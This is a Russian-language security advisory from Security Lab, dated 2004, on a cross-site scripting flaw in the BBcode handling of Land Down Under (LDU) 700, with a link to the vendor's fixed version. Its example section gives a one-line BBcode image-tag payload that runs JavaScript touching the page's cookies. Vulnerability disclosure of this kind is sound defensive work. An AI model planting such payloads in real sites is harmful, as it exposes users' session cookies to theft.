Security Lab

Межсайтовый скриптинг в Land Down Under (LDU) в обработке BBcodes

Дата публикации:31.05.2004
Дата изменения:14.03.2009
Всего просмотров:1160
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: Land Down Under (LDU)
Уязвимые версии: Land Down Under (LDU) 700

Описание: Уязвимость обнаружена в Land Down Under (LDU) в обработке BBcodes. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

[img]javascript:alert(document.cookie);[/img]

URL производителя:http://ldu.neocrome.net/

Решение: Установите обновленную версию программы: http://ldu.neocrome.net/page.php?id=1357

Ссылки: LDU (land down under) xss vulnerability